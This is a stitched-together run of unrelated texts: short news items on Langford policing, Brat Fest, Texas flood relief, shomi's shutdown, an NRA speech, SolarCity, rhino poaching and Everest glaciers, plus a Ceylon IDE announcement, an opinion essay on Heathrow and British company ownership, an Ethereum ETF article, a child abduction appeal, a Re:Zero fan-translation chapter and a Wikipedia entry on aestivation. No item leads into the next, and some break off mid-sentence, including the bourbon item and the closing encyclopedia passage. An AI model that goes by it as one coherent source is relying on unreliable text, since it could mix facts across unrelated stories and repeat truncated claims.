Adding four new officers will allow for a full time bicycle and special projects unit , focusing patrols on community trails , parks and the downtown core . The unit will also provide coverage for special events and target “ hot spots ” within Langford .
“ Community safety is , and will remain , a priority for Langford , ” said Langford Mayor Stewart Young . “ Council looks forward to working with the RCMP , both now and into the future , to ensure that Langford remains a safe family friendly community . ”
The additions come on the heels of a series of attacks on trails in the surrounding area . Most recently , in March , a woman was beaten and sexually assaulted on the Galloping Goose trail .
Facebook Conversations
Tradition dictates that each year , on the Friday morning before Memorial Day weekend , the NBC15 Morning Show team will descend upon World 's Largest Brat Fest and broadcast the bejeezus out of Take Your Brat to Work Day . Apparently it 's for charity . Well , OK .
But this year , in its race to embrace Facebook Live video , NBC15 failed to consider if it was wise to broadcast a close-up of weatherman Charlie Shortino taking a big , messy bite out of a brat . Presumably using a GoPro , the news team captured an awfully intimate shot of Shortino smattering mustard onto a bratwurst , chomping off a big ol ' bite , and then chewing with his mouth open . Watch it for yourself , or just let these succinct Facebook comments convey the imagery :
“ that is gross no one wants that much of a close up .. and dude you have lots of hairs in your nose lol ”
“ Yuck ”
“ Charlie you creep ”
There you have it . Despite the nauseating video , Brat Fest still managed to sell 21,734 bratwursts in a span of three hours this morning . We 're hoping 21,733 of them were eaten with something approaching human dignity .
Cox Media Group partners have launched “ Convoy of Care ” to help tens of thousands of people affected by the historic flooding in Texas .
Donations of bottled water will be accepted from 10 a.m. to 8 p.m. on Tuesday , Wednesday and Thursday at WSB studios at 1601 West Peachtree St . Truckloads of water will be taken to impacted Texas areas over the weekend .
Donations of bottled water will be accepted from 10 a.m. to 8 p.m. Tuesday , Wednesday and Thursday .
In addition to water donations , those wishing to help in other ways are encouraged to round up their grocery receipts at any Kroger stores , with those monies going toward disaster relief efforts .
Convoy of Care is a partnership effort by WSB-TV , News 95.5 and AM 750 WSB , The Atlanta Journal-Constitution , KISS 104.1 , B98.5 and 97.1 The River .
TORONTO – Canadian video streaming service shomi says it is shutting down as of Nov. 30 .
For $ 8.99 per month , shomi allowed Canadians to watch a huge selection of TV programming and movies on numerous platforms – tablet , mobile , online , Xbox 360 , Apple TV , Chromecast — and via set-top boxes for Rogers and Shaw TV subscribers .
Acclaimed and buzzworthy shows available on shomi included Vikings , Empire , Fresh off the Boat , Transparent , Outlander , iZombie and Jane The Virgin .
READ MORE : ‘ Fresh off the Boat ' star Randall Park embraces return of racially diverse comedy
“ We 're really grateful to Canadians who enthusiastically invited us into their living rooms and took us with them on their phones , tablets and laptops , ” David Asch , Senior Vice President and General Manager of shomi said in a release .
Shomi was launched by Rogers and Shaw in November 2014 and opened to all Canadians in Aug. 2015 .
It was seen as a competitor to Netflix and other similar video streaming services , such as Bell 's CraveTV .
WATCH BELOW : The cast of “ Transparent “ talk about the upcoming third season and the importance of becoming your “ true self. ” ET Canada has the latest .
“ The business climate and online video marketplace have changed markedly in the last few years . Combined with the fact that the business is more challenging to operate than we expected , we 've decided to wind down our operations , ” Asch said . “ We 're proud of the great service we created and the role we played in the evolution of Canada 's video landscape . ”
Rogers said it expects to incur a loss on investment of approximately $ 100 million to $ 140 million in its third quarter , which ends Friday .
“ We tried something new , and customers who used shomi loved it , ” Melani Griffith , senior vice-president of content at Rogers , said in another statement .
“ It 's like a great cult favourite with a fantastic core audience that unfortunately just is n't big enough to be renewed for another season . ”
-with files from The Canadian Press
Today , we 're proud to announce the first official release of the Ceylon IDE .
This release is fully compatible with the already-released Ceylon M1 `` Newton '' command line distribution which contains the compiler , documentation compiler , language module , and runtime . On the other hand , Ceylon IDE can be used as a standalone Ceylon development tool , even if the full Ceylon distribution is not already separately installed .
You can install Ceylon IDE from our Eclipse plugin update site . The welcome page is a gentle way to get started with Ceylon .
Main features
A full list of features with screenshots can be found here .
Among the features that have greatly enriched the IDE since its first pre-release builds , the following stand out :
A Ceylon perspective , welcome page , and cheat sheets .
Wizards to create new Ceylon projects , modules , packages , and units .
Cross-project dependencies and navigation : add another Ceylon project on the build path , and dependencies are automatically handled .
Full integration with the Ceylon module architecture : resolve dependencies in an external module repository , and easily export your Ceylon project as a module to a selected repository .
Enhancements to refactorings , including the ability to refactor even in dirty ( unsaved ) editors .
New quick-fixes : for example , when an identifier is unknown , automatically create a new file containing a stub for the missing declaration .
Improved autocompletion : proposals are now sorted to prioritize those which are assignable to the expected type , as well as those which are declared nearby .
Customization : easily configure your own colors for syntax highlighting .
And , of course , many adjustments and bug fixes to provide a stable release .
About Ceylon
This page provides a quick introduction to the language . The draft language specification is the complete definition .
Source code
The source code for Ceylon , its specification , and its website , and its IDE is freely available from GitHub :
https : //github.com/ceylon
Issues
Bugs and suggestions may be reported in GitHub 's issue tracker .
Community
The Ceylon community site includes documentation , the current draft of the language specification , the roadmap and information about getting involved .
http : //ceylon-lang.org
Please enable JavaScript to view the comments powered by Disqus .
During his April 28 speech to the NRA 's Leadership Forum in Atlanta , President Donald Trump told the audience , “ You came through for me and I am going to come through for you . ”
Trump began his speech by thanking NRA-ILA executive director Chris Cox and NRA senior Vice President Wayne LaPierre for their hard work in defending freedom .
He recalled days gone by in the NRA , saying , “ No one was prouder to be an American than the beloved patriot Charlton Heston . I remember Charlton , he was out there fighting when maybe a lot of people did n't want to be fighting . ”
Trump then turned his attention to his own presidency , saying , “ Only one candidate in the general came to speak to you and that candidate is now the president of the United States , standing before you again. ” He added , “ You came through for me , and I am going to come through for you . ”
He said , “ We have news that you 've been waiting for a long time–the eight-year assault on your Second Amendment freedoms has come to a crashing end… No longer will federal agencies be coming after law-abiding gun owners. ” He said , “ We want to ensure you of the sacred right of self-defense of all our citizens ” and observed , “ The right of self-defense is essential to public safety . ”
He said , “ Our police and sheriffs know that when you ban guns , only the criminals will be armed . ”
Trump then made a promise :
I will never , every infringe on the right of the people to keep and bear arms . Freedom is not a gift from government , freedom is a gift from God .
AWR Hawkins is the Second Amendment columnist for Breitbart News and host of Bullets with AWR Hawkins , a Breitbart News podcast . He is also the political analyst for Armed American Radio . Follow him on Twitter : @ AWRHawkins . Reach him directly at awrhawkins @ breitbart.com .
It was not Heathrow 's finest hour . The pain was there to see in the pictures of thousands of passengers delayed without information , left to camp for hours on inhospitable floors . Less visible were many thousands of others , like some friends of mine , who , courtesy of the internet and the closure of Heathrow 's slip roads , thankfully never made it to the airport at all . The freakishly heavy snowfall would have disrupted any world airport , but not for as long as Heathrow , which was still suffering acute delays three or four days later .
Most passengers could see that the airport owners ' priorities were not theirs . The acres dedicated to retailing compared to the paltry investment in snowploughs were signal enough of what British Airports Authority cares about – generating the cash flow to give Ferrovial , the ultimate Spanish owner , the interest and dividend payments to make its over-expensive asset pay . Heathrow is the Manchester United or Liverpool FC of the airport world , an organisation which was expensively taken over by outsiders and which now has to create the surpluses to pay off the debts incurred in its purchase . The consequence is an extraordinary vulnerability to any shock .
It is phenomenally stupid – a combination of the pre-financial crash boom in which banks showered credit like confetti on allcomers regardless of the consequences , together with Britain 's callow approach to ownership . The country has never seriously debated what good ownership of assets might constitute – whether by a football club or a public company . Instead , the response to the social and economic irresponsibility of some private ownership has been to call for nationalisation and public ownership , while the response to the waste and lack of innovation of some public ownership has been to call for private ownership . There has been too little attempt to think through what the constitution and process of ownership might be that would create great owners , whether in the public or private sector , or among the many other forms of ownership , ranging from partnership to co-operatives .
Instead , with the rise of the neoconservative right , there has just been the unquestioning assumption that the best form of ownership is private ; in Britain , that necessarily means our idiosyncratic variant of the public limited company . This represents the oddest and most regressive constitution for private ownership anywhere in western capitalism . British company law makes no requirement on shareholders and directors to have any obligation to be good stewards of their assets , their employees or their customers . Shareholders ' rights to do what they want with their shares to maximise their immediate value is more stark than anywhere else and directors ' responsibilities are only to serve the interests of these madly unconstrained shareholders .
The debacle at Heathrow is one consequence of this insouciance , but the wreckage stretches across the economic landscape . British companies think , strategise , innovate and invest their way to success far less than their competitors in different ownership regimes . They know the penalty for one wrong move is to be taken over as responsibility-free shareholders sell out to some opportunistic predator advised by London 's network of lawyers , accountants and investment bankers who grow fat on the lush fees . This Christmas , a great British company , De La Rue , printer of our banknotes and banknotes worldwide , is fighting for its life against a takeover from French rival Oberthur . No such high price is paid in France for the inevitable stutters in any company 's life . Last Christmas in Britain , it was Cadbury trying to fend off the attentions of Kraft , which , after the takeover , organised Cadbury 's finances so that it paid hundreds of millions less tax . Next Christmas , it will be someone else . The debts for these never-ending takeovers have to be paid for by someone and that is us .
No other capitalist economy organises its affairs in this way . When British Airports Authority was privatised in 1986 – with the not unreasonable aim of making it more innovative and freeing it from the stultifying anti-investment rules of the Treasury – there was no creative thought about what constitution of ownership would be the best for an airport . The Americans require their airports to be owned by , not for , companies whose constitution obliges the owners and managers to put the public interest of efficient and comfortable travel first . In Britain , the issue was not even aired . BAA was simply to become a British public limited company , whose sole objective would be profit maximisation . In 2006 , there was the inevitable contested take-over . Ferrovial entered a Dutch auction against a consortium led by the investment bank Goldman Sachs . The price of BAA was bid up to £9bn . In the City , there was much self-congratulation about how shareholder value had been maximised and the various partners in the advising firms all pocketed gigantic fees .
Critics were told that it was vital that Britain stayed open for business , that ownership does not matter . What mattered was that City investment banks , lawyers and accountants had a steady `` deal flow '' of companies available for takeover and so secure the international position of the City of London . Britain would eventually not have any companies of its own – they would all be foreign-owned , rather as all Wimbledon champions are foreign – but we should be delighted to be the country where so many takeover transactions took place just as we are delighted to host Wimbledon .
This self-serving ideology is betraying Britain . The public limited company is a remarkable institution . Incorporation allows the sharing of risk by many providers of private savings . In return for incorporation , the company receives the licence to trade and to make profits as long as it observes the law of the land . The public company is the great engine of capitalist growth . But the constitution of the company matters . Shareholders and directors can be required to take interests into account other than their own immediate profits . Other countries do this and prosper . Not the British .
The lesson is that ownership counts , a view that as disaster piles on disaster is at last gaining some transaction . I chair the recently established Ownership Commission to investigate how better ownership might be achieved , from both introducing mutuality and co-operatives into the public sector to potential revisions in company law for public companies . It reports next autumn . The subject matter is not just technical stuff . This Christmas , there will be people who are not with those they love thanks to BAA 's priorities . Good ownership matters very much indeed and Britain has too little of it .
After announcing a $ 99.99 SRP for Booker 's , Beam Suntory has decided to not drastically increase the price from $ 59 . Instead , the company says it will gradually increase the price .
I first learned of this through social media rumors and
Below is the company 's full statement :
“ As we 've previously shared , Booker 's Bourbon will experience supply constraints starting next year . As a result , we must reduce our batch releases to four per year . We apologize to anyone who is unable to locate the product in the future . Because of the rarity and high quality of this liquid , and our need to maintain our supply without sacrificing any production standards , we have decided to increase the price of Booker 's . We 'll be implementing the previously announced price increase over time , and in 2017 you can expect to see Booker 's on shelf for $ 69.99- $ 74.99 . ”
Stay In Touch !
Will Ethereum Beat Bitcoin in the Race to an ETF ?
Operators of the EtherIndex Ether Trust are confident that their Ethereum-based exchange-traded fund ( ETF ) will be approved by the US Securities Exchange Commission ( SEC ) before the Winklevoss twins ' bitcoin ETF COIN .
On April 21 , the EtherIndex team filed a rule change with the SEC and NYSE Arca to its original Ether Trust ETF proposal . The rule change indicated on the official document accepted by the SEC provided the commission with a certain time frame to either reject or approve the ETF .
On March 10 , the SEC officially rejected the Winklevoss twins ' bitcoin ETF COIN . In its official statement , the SEC claimed that the ETF was denied due to the lack of regulations in overseas bitcoin markets . The SEC stated :
“ Several commenters note that the majority of bitcoin trading occurs on exchanges outside the United States . One commenter claims that most daily trading volume is conducted on poorly capitalized , unregulated exchanges located outside the United States and that these non-US exchanges and their practices significantly influence the price discovery process . Another commenter states that the biggest and most-influential bitcoin exchange is located outside U.S. jurisdiction . ”
The Ethereum ETF could have a higher probability of being approved by the SEC due to its non-currency-like attributes and characteristics . In essence , Ethereum 's tokens , ETH , are designed to support the network 's decentralized applications as ‘ gas . ' Users can pay gas to applications or when initiating smart contracts on the network . Hence , it is difficult to establish Ethereum 's ETH as a cryptocurrency .
As noted by the SEC :
“ The Exchange represents that unlike bitcoin , ether was not designed to function purely as a store of value . Instead , ether was meant to pay for specific actions on the Ethereum Network . However , according to the Exchange , ether 's market is currently supported by many of the same online exchanges and the same infrastructure that has developed around the bitcoin network . ”
For this reason , because the SEC perceives Ethereum 's ETH as an asset , rather than as a currency like bitcoin , it will most likely provide a leeway for the Ethereum Trust ETF .
More importantly , the main argument of the SEC behind its denial of the bitcoin ETF COIN was the lack of overseas regulation in bitcoin . EtherIndex Ethereum Trust 's ETF proposal was filed after major markets including China and South Korea have enforced tight Know Your Customer ( KYC ) and Anti-Money Laundering ( AML ) policies on local exchanges .
According to various cryptocurrency market data providers , Ethereum 's three largest exchange markets are the US , South Korea , and China , with 21.7 percent , 11.1 percent , and 6.5 percent market share respectively . Since the three markets which dominate the global Ethereum exchange market are well regulated , the SEC will not be able to disapprove the Ether Trust ETF under the criteria of “ lack of overseas regulation . ”
Furthermore , as outlined by ETF analyst David Dierking , Ethereum 's recent partnership strategy to form Enterprise Ethereum Alliance could potentially have a massive impact on the SEC 's decision . Currently , multi-billion dollar companies such as BHP Billiton , Microsoft , and JPMorgan are working with the EEA to develop Ethereum-based applications . If the SEC already understands ETH as a token which serves as the basis for commercial applications and projects initiated by the abovementioned industry leaders , Ethereum has already made a case for legitimacy and regulation .
A woman suspected of abducting her two young sons poses ' a risk of harm ' to them , a family court has warned .
Nottingham Family Court said it had ordered that Dylan Madge , six , and Louis Madge , nine , should be removed from the care of mother Samantha Baldwin on Monday .
The 42-year-old was last seen near Nottingham city centre that day , although a missing persons appeal was launched on Tuesday after she vanished with her sons .
Today , police released fresh CCTV images of the mother with her two children .
Fresh CCTV images have appeared of Ms Baldwin with Dylan ( right ) and Louis ( left )
Louis Madge aged nine , and Dylan Madge , aged six , have also not been seen since Monday
Samantha Baldwin does not have legal custody of the boys ( Nottinghamshire Police/PA )
On Wednesday , police announced the investigation had become an abduction inquiry .
In a statement Nottingham Family Court said : 'It is assumed that she has abducted Louis and Dylan . The children have now been made wards of court . Miss Baldwin is considered to pose a risk of harm to the children . '
On Friday , Nottinghamshire Police Superintendent Rich Fretwell said officers were growing 'increasingly concerned ' for the children 's welfare and safety .
He said : 'Samantha has no legal custody of the boys at this time . Our investigation team are exploring a number of lines of inquiry . There 's always the possibility that Samantha could be being harboured by someone .
'We would urge that person to come forward and let us know where the boys are . '
CCTV footage showing Samantha Baldwin 's last known movements
Police called on owners and staff at guest houses , bed and breakfasts , hotels and caravan parks to check their registers and be aware she may be using a different name .
Two women aged 62 and 36 who were arrested on suspicion of assisting an offender have been released on bail .
Ms Baldwin is described as 5ft 7in and of slim build with shoulder-length , highlighted blonde hair and green-blue eyes .
She was last seen wearing a red knee-length coat but may have changed her clothing .
Louis has collar-length straight fair hair , a fair complexion and blue eyes , while Dylan has collar-length straight dark brown hair , a tanned complexion and brown eyes .
Anyone with information should call Nottinghamshire Police on 101 urgently , quoting incident number 332 of March 27 .
Democrats have said the suit is a waste of taxpayers ' money . House to spend $ 350K on Obama suit
The House of Representatives will not spend more than $ 350,000 to sue President Barack Obama , according to a contract released Monday by a congressional committee .
BakerHostetler 's David Rivkin will represent the House as it seeks to show that Obama has misused executive authority . The contract expires in January 2015 and the House is paying $ 500 per hour .
Story Continued Below
The House voted along party lines to sue Obama , principally for delaying Obamacare 's mandate that companies provide health care for their employees . Republicans say Obama delayed the provision — and essentially changed the law — without consulting Congress .
( Also on POLITICO : Local , state Democrats go rogue )
Democrats have said the suit is a waste of taxpayers ' money and is the first step in impeaching Obama . Republicans have repeatedly said they do n't plan to impeach Obama .
“ Rather than work with Democrats to jumpstart the middle class , House Republicans continue to waste time and taxpayer-dollars on a lawsuit against the President of the United States , ” House Minority Leader Nancy Pelosi of California said in a statement . “ We finally know that Republicans have handed a $ 500-an-hour , no-bid contract to a Washington law firm for a lawsuit that lays the groundwork for impeachment and rallies the most extreme elements of the Republican Party . ”
* * * * * * * * * *
Translator : Nicholas Ipsen
* * * * * * * * * *
Editor : TranslationChicken
* * * * * * * * * * *
Previous Part 2/4 : https : //translationchicken.com/2016/11/28/rezero-arc-4-chapter-9-the-graveyard-part-24/
===
Its wavy color faintly resembled something along the lines of “ Autumn Leaves ” , and even having noticed this from a distance , Subaru could n't stop himself from… well , recommending it .
[ Garfiel : Hey , you 're pretty sensible after all , are n't ya . You get that just one cup is n't enough…… Pfft ! Haah ! ? Ooy , you… is n't this one just leaf water…… ? ]
[ Ram : If it wets your throat , whether it 's water , tea or leaf water it 's all the same , correct ? Since you 've already put it on your lips , go ahead and drink the whole thing . If you leave anything… I will twist it off ]
Without saying what exactly she would be twisting off , she shot a sharp glare at Garfiel 's crotch . Just from that , Subaru realized that her target was the vitals , and unconsciously closed up his legs at the sense of danger . Garfiel reluctantly emptied the cup of its contents , wringing at the bitterness . And on the side , Roswaal , who had so far only been observing their conversation , suddenly spouted ,
[ Roswaal : Aaa~~ha . Are a~ll of you even worried about my condition and have any intention of allowing me to rest ? Or is it your actual plan to make me laugh and o~pen up my wounds ? If that 's the case , you 're certainly succee~ding ]
Saying so , Roswaal lightly touched the bandage wrapped around the upper part of his head while grinning bitterly . In fact , one could see a faint red color beginning to spread across the white of the fabric . Just then , the mood of the room , which had been relaxed up until now , turned , and Ram , whose face had changed colour , approached Roswaal . She then covered his hand , which was pressing down on the wound , with her own , and
[ Ram : I 'm very sorry , Roswaal-sama . Even though Ram was by your side…… ]
[ Subaru : Was n't it your tea-jokes that made sure he would laugh ? ]
His disruption was silenced by a rock-shattering glare from Ram , and Subaru zipped it , and took a quick look at Roswaal 's condition . At least , the bleeding did n't seem to be connected to anything serious . The wounds must have only stopped bleeding recently ――in other words , now was probably the most important time for his recovery .
[ Emilia : Roswaal , I think it 'd be best if I treat you after all… ]
[ Roswaal : No~~ , that would not be necessary , Emilia-sama ]
Reaching the same conclusion as Subaru , spirits emerged in the air surrounding Emilia as she stepped toward Roswaal . But , she was stopped by Roswaal himself shaking his head . The spirits , which were shining with a blue-white phosphorescence , wavered , as if affected by their mistress ' uncertainty .
Watching the side of Emilia 's fair cheeks , Subaru noticed .
――As the emerging spirits floated around Emilia , for reasons Subaru could not understand , Garfiel stared at her with eyes of frozen emotion .
[ Roswaal : After all , right now , there 's something much more important than my trifling i~njuries . It 's not like my li~fe is in any danger , so please prioritize the other matter first ]
[ Emilia : Even if you say that , there 's no way I can do that . When there is a person who 's injured , to set that aside for something else would be… ]
[ Roswaal : Even if I tell you this is necessary in order for you to sit upon the throne ? ]
Emilia 's usual rhythm shattered , and the scene of her about to heal him by force if necessary , froze up . Listening to Roswaal 's statement , Emilia 's cheeks grew stiff , and her violet eyes opened wide . The yellow left eye watching this in front sharpened as if peering into her , gleamed enigmatically ,
[ Roswaal : To the house of Mathers , this “ Sanctuary ” is just a piece of land which had been passed down through the generations , but to Emilia-sama 's future , it is of profound… yes , of profou~nd significance . Therefore no matter what , I certainly intended to eventually invite you here . ――It 's just , you showed up a little earlier than I had pla~nned… no ? ]
[ Emilia : Necessary for me…… ? Hey , what is that supposed to mean…… ]
[ Roswaal : The problem with this “ Sanctuary ” , and Emilia-sama 's problem are intimately tied . So perhaps , in this place , you would find it . Emilia-sama 's support , that is ]
[ ―― ! ? ]
Frozen in place , Subaru watched as Emilia 's expression changed . Having prompted this change , Roswaal observed her expression , and seemed to take it in as if all was according to plan . On the other hand , Subaru , still unable to pick up the exchange of emotions between the two , was left with an itch in his teeth .
However , before that agitation could be turned into words , Roswaal pointed to the silent Garfiel .
[ Roswaal : Your designation , Garfiel . Guide these two to the “ Sanctuary. ” ――Rather , the tomb ]
[ Garfiel : ――Heh , that a good idea ? ]
Swinging his emptied porcelain cup from side to side on his finger , Garfiel let out a low laugh . In response to being questioned , Roswaal drew in his chin and gently caressed Ram 's peach-colored hair as she changed the bandages around his wounds .
[ Roswaal : First and foremost it is crucial to understand the situation , a~fter all . Explaining the circumstances and the other matters can come a~fter the Sun has set , but that is not the case for the tomb ]
[ Garfiel : Ah , that'so , the Sun 's going down soon . Wo n't be so simple once that happens . Alright , I 'll take up guiding for ya ]
Standing up , Garfiel placed his cup onto the chair he 'd been sitting on , and turned to face Subaru and Emilia . Looking at the two whom the talk revolved around , but had been left out entirely , he slanted his head and opened his mouth to bare his fangs ,
[ Garfiel : Do n't look so dumb . If you do n't wan na become “ like the rampaging Hoikoro from yesterday ” or something stupid like that , we better get going ]
[ Subaru : Wait , wait , wait ! We 're not following the conversation at all . I was n't even done talking to Roswaal in the first place , you know . At least let me finish that before…… ]
[ Ram : His wounds have opened . Changing his bandages and letting him rest is the priority now . Barusu should do as Roswaal-sama instructed , and head to the tomb up ahead ]
Subaru tried to put up a fight against Garfiel 's forcefulness , but that was intercepted by Ram 's commanding voice . She faced him with her usual cold gaze , and placed a hand on the bed ,
[ Ram : Calm down , let us talk once night comes . Roswaal-sama is n't going to run away or anything like that . But if you do n't visit the grave before sun-down , that is going to run away . ]
[ Subaru : I 've never heard of such an energetic grave in my life ! ]
While scratching his head in resignation , Subaru felt Emilia 's gaze piercing into the side of his face . Her eyes were flickering with feeble emotions , and she seemed to be leaving it up to Subaru to decide what they should do .
To stay here and finish their conversation with Roswaal , or to be swept along by his will and be led to the gravesite by Garfiel . ――The answer has been decided .
[ Subaru : I understand . We 'll go to that grave place . It 's necessary , is n't it ? We 'll certainly have you properly answer our questions once we get back ]
[ Roswaal : So~rry , that the situation has become like this . O~nce night falls , we can discuss all sorts of things , mu~~ch more thoroughly ]
Hearing Subaru 's opinion , Emilia relaxed her shoulders , and Roswaal nodded with satisfaction . Garfiel and Ram also seemed to accept it , and the two of them began to move onto their respective tasks . However , before that , Subaru said [ Just one thing ] , raising a single finger .
[ Subaru : Before heading to the grave , there 's something I want to ask you . ]
[ Roswaal : Mmm~~ ? I do n't really mind ? If it 's something I can answer simply , you can go ahead and ask me a~nything ]
[ Subaru : Well then , I 'll take you on your word . ―― “ Rem ” , have you heard that name before ? ]
Next Part 4/4 : https : //translationchicken.com/2016/12/01/rezero-arc-4-chapter-9-the-graveyard-part-44/
===
I will be continuing the Google Drive draft here in an hour or so : https : //www.patreon.com/posts/re-zero-arc-4-9-7374617
Yesterday Nicholas lost access to his files , and we ended up working together on Google Drive ! It was great fun , and really awesome to see some of you guys there !
I 'll get some lunch and come back to Google Drive in about an hour to keep working on Part 4/4 ! :3
===
( she will twist it off )
Next Part 4/4 : https : //translationchicken.com/2016/12/01/rezero-arc-4-chapter-9-the-graveyard-part-44/
SolarCity reported a third-quarter loss as the largest U.S. rooftop developer poured record revenue into new systems and a panel factory its building in Buffalo , New York .
The loss was $ 19.1 million , or 20 cents a share , compared with net income of $ 19.2 million , or 19 cents , a year earlier , the San Mateo-based company said in a statement Thursday . Excluding some items , it lost $ 2.10 a share , exceeding the $ 1.91 average loss of 17 analysts ' estimates compiled by Bloomberg . Sales rose to $ 113.9 million from $ 58.3 million .
The company has lost money in all but two quarters since its December 2012 initial public offering , directing revenue into new installations and other efforts that will drive growth .
SolarCity began offering systems to small businesses during the quarter and acquired a developer in Mexico in its first international expansion . The company 's 100-megawatt pilot factory in Fremont is scheduled to reach full production this year , turning out panels with a 22.04 percent efficiency , the highest in the industry . Its 1-gigawatt Buffalo plant will begin operating in 2017 .
Chief Executive Officer Lyndon Rive also initiated a hiring spree that included adding 500 employees in a single day , a sign the company plans to continue its aggressive growth , according to Ben Kallo , an analyst at Robert W. Baird & Co .
“ We expect SolarCity to continue to maintain or gain market share , ” Kallo said in a note to clients Monday . He has the equivalent of a buy rating on the shares and a $ 68 target price. ” It has been ramping its sales force to meet accelerating demand . ”
Environment Minister Prakash Javadekar travelling on a boat inside the Kaziranga National Park on Friday . ( source : PTI Photo )
The Centre would fund setting up a Special Rhino Protection Force ( SRPF ) for protecting one-horned rhinos in Kaziranga National Park and other rhino habitats in Assam , union forest and environment minister Prakash Javadekar said on Saturday . He also said that the Centre would look towards covering more rhino-poaching cases by the CBI .
Advertising
Winding up his two-day visit to Assam during which he concentrated only on protecting rhinos , Javadekar told a press conference that the Centre was for “ zero-tolerance ” towards rhino poaching and asked the Congress government in the state to be more pro-active in this regard . He visited Kaziranga along with Assam Forest Minister Rakibul Hussain on Friday and also listened to public grievances there .
“ This Special Rhino Protection Force , fully funded by the Centre , will essentially comprise of local youth knows the rhino habitat and has access to a lot of vital information regarding rhinos and movement of suspicious people close to Kaziranga . The government also believes in increasing community participation in protecting wildlife and forests . After all it is the local community which gets most affected , ” Javadekar said .
As many as 22 rhinos have been killed by poachers in Assam in the current year , while forest guards too have gunned down 20 poachers in the past eight months , Javadekar said . Twenty-four poachers on the other hand have been apprehended since January , he said . “ Poaching has to be brought down to zero , ” he added .
The minister also announced that the Centre would constitute a task force that would hold a series of consultations with all stakeholders in the next six months and come out with a comprehensive strategy to protect rhinos and wipe out poaching . The government would also ensure that six animal corridors that Kaziranga animals use would also be made free of human obstruction soon .
On the demand for handing over all rhino-poaching cases to the CBI , Javadekar said since two cases are already with the agency , he would find out whether more cases could be brought under its purview . “ I will soon find out from the CBI if it could expand the scope of its probe and take up some of the glaring cases for investigation , ” he said .
Terming his trip to Assam as “ mission rhino ” , Javadekar also asked the state government to ensure eviction of all encroachers from inside national parks , wildlife sanctuaries and reserved forests . “ Development and environment protection have to go hand in hand , ” he said . The union minister had said in Kaziranga that the BJP government intended to increase the country 's forest cover from the existing 24 per cent to at least 33 per cent in the next 10-15 years .
Admitting that he was surprised at the overwhelming demand by the people for protecting rhinos , Javadekar said the people of Assam were totally committed in this regard . “ The people of Assam love rhinos , take pride in the animal and wholeheartedly desire that the animal is protected . I am amazed that the demand for rhino protection has become a mass movement here , ” he said .
CAMPA funds to states : The Centre would soon release 90 per cent of the Rs 33,000 crores lying in the Compensatory Afforestation Fund Management & Planning Authority ( CAMPA ) to the states , the union minister said . He said that though the matter was lying with the Supreme Cout , the government was expecting the apex court to dispose the matter in the next few days .
Advertising
“ The states however will be expected not to reduce their own respective state allocation after the CAMPA funds are released , ” he said .
By the end of this century , the landscape around Mount Everest may drastically change . As the planet continues to warm , the Everest region of Nepal could lose most of its glaciers , according to a study published in the journal The Cryosphere .
“ We did not expect to see glaciers reduced at such a large scale , ” said Joseph Shea , a glacier hydrologist at the International Center for Integrated Mountain Development in Nepal and lead author of the new report . “ The numbers are quite frightening . ”
Dr. Shea and his colleagues found that moderate reductions in greenhouse gas emissions could result in a 70 percent loss of glaciers around Mount Everest , while a business-as-usual scenario in which emissions remain at the same levels could result in a 99 percent loss .
To arrive at these findings , Dr. Shea and his colleagues used a computer model for glacier melt , accumulation and redistribution . They customized the model with data on temperature and precipitation , measurements from the field and remote-sensing observations collected over 50 years from the Dudh Koshi basin , which includes Mount Everest and several of the world 's other highest peaks .
This article is about a state of animal dormancy , similar to hibernation . For other uses , see Aestivation ( disambiguation )
Aestivation or æstivation ( from Latin : aestas , summer , but also spelled estivation in American English ) is a state of animal dormancy , similar to hibernation , although taking place in the summer rather than the winter . Aestivation is characterized by inactivity and a lowered metabolic rate , that is entered in response to high temperatures and arid conditions . [ 1 ] It takes place during times of heat and dryness , the hot dry season , which are often the summer months .
Invertebrate and vertebrate animals are known to enter this state to avoid damage from high temperatures and the risk of desiccation . Both terrestrial and aquatic animals undergo aestivation . The fossil record suggests that aestivation may have evolved several hundred million years ago .
Organisms that aestivate appear to be in a fairly `` light '' state of dormancy , as their physiological state can be rapidly reversed , and the organism can quickly return to a normal state . A study done on Otala lactea , a snail native to parts of Europe and Northern Africa , shows that they can wake from their dormant state within ten minutes of being introduced to a wetter environment .
The primary physiological and biochemical concerns for an aestivating animal are to conserve energy , retain water in the body , ration the use of stored energy , handle the nitrogenous end products , and stabilize bodily organs , cells , and macromolecules . This can be quite a task as hot temperatures and arid conditions may last for months . The depression of metabolic rate during aestivation causes a reduction in macromolecule synthesis and degradation . To stabilize the macromolecules , aestivators will enhance antioxidant defenses and elevate chaperone proteins . This is a widely used strategy across all forms of hypometabolism . These physiological and biochemical concerns appear to be the core elements of hypometabolism throughout the animal kingdom . In other words , animals who aestivate appear to go through nearly the same physiological processes as animals that hibernate . [ 2 ]
Invertebrates [ edit ]
Theba pisana snails aestivating on a row of fence posts in Introducedsnails aestivating on a row of fence posts in Kadina , South Australia
Cernuella virgata aestivating on a wire fence near Numerous individuals of the snailaestivating on a wire fence near Glanum , in the south of France
Mollusca [ edit ]
Gastropoda : some air-breathing land snails , including species in the genera Helix , Cernuella , Theba , Helicella , Achatina and Otala , commonly aestivate during periods of heat . Some species move into shaded vegetation or rubble . Others climb up tall plants , including crop species as well as bushes and trees , and will also climb man-made structures such as posts , fences , etc .
Their habit of climbing vegetation to aestivate has caused more than one introduced snail species to be declared an agricultural nuisance .
To seal the opening to their shell to prevent water loss , pulmonate land snails secrete a membrane of dried mucus called an epiphragm . In certain species , such as Helix pomatia , this barrier is reinforced with calcium carbonate , and thus it superficially resembles an operculum , except that it has a tiny hole to allow some oxygen exchange . [ citation needed ]
There is decrease in metabolic rate and reduced rate of water loss in aestivating snails like Rhagada tescorum , [ 3 ] Sphincterochila boissieri and others .
Arthropoda [ edit ]
Insecta : Lady beetles ( Coccinellidae ) have been reported to aestivate . [ 4 ] Mosquitoes also are reported to undergo aestivation . [ 5 ] False honey ants are well known for being winter active and aestivate in temperate climates . Bogong moths will aestivate over the summer to avoid the heat and lack of food sources . [ 6 ] Adult alfalfa weevils ( Hypera postica ) aestivate during the summer in the southeastern United States , during which their metabolism , respiration , and nervous systems show a dampening of activity . [ 7 ] [ 8 ]
Crustacea : An example of a crustacean undergoing aestivation is with the Australian crab Austrothelphusa transversa , which undergoes aestivation underground during the dry season . [ 9 ]
Vertebrates [ edit ]
Reptiles and amphibians [ edit ]
Thrinaxodon liorhinus shared its burrow with a temnospondyl amphibian , Broomistega putterilli . [ 10 ] Aestivation has been put forward as the most likely explanation why this therapsid cynodontshared its burrow with a temnospondyl amphibian ,
